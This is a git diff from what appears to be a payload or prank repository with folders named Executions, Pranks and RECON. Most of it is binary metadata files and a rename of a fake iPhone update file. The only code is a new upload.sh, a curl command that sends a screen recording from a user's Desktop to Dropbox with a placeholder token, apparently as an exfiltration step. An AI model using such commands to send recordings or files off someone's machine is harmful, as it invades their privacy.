diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..91f9eff Binary files /dev/null and b/.DS_Store differ diff --git a/Executions/.DS_Store b/Executions/.DS_Store new file mode 100644 index 0000000..40eeaf3 Binary files /dev/null and b/Executions/.DS_Store differ diff --git a/Obscurity/.DS_Store b/Obscurity/.DS_Store new file mode 100644 index 0000000..d390696 Binary files /dev/null and b/Obscurity/.DS_Store differ diff --git a/Pranks/.DS_Store b/Pranks/.DS_Store new file mode 100644 index 0000000..36b7730 Binary files /dev/null and b/Pranks/.DS_Store differ diff --git a/Pranks/.swp b/Pranks/.swp new file mode 100644 index 0000000..3787e6f Binary files /dev/null and b/Pranks/.swp differ diff --git a/Executions/IPHONE Fake Update.txt b/Pranks/IPHONE Fake Update.txt similarity index 100% rename from Executions/IPHONE Fake Update.txt rename to Pranks/IPHONE Fake Update.txt diff --git a/RECON/.DS_Store b/RECON/.DS_Store new file mode 100644 index 0000000..cbb44d8 Binary files /dev/null and b/RECON/.DS_Store differ diff --git a/upload.sh b/upload.sh new file mode 100755 index 0000000..019d775 --- /dev/null +++ b/upload.sh @@ -0,0 +1 @@ +curl -X POST "https://content.dropboxapi.com/2/files/upload" -H "Authorization: Bearer Your API token Here" -H "Dropbox-API-Arg: {\"path\": \"/screen_recording.mp4\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary "@/Users/USERNAME_HERE/Desktop/screen_recording.mp4"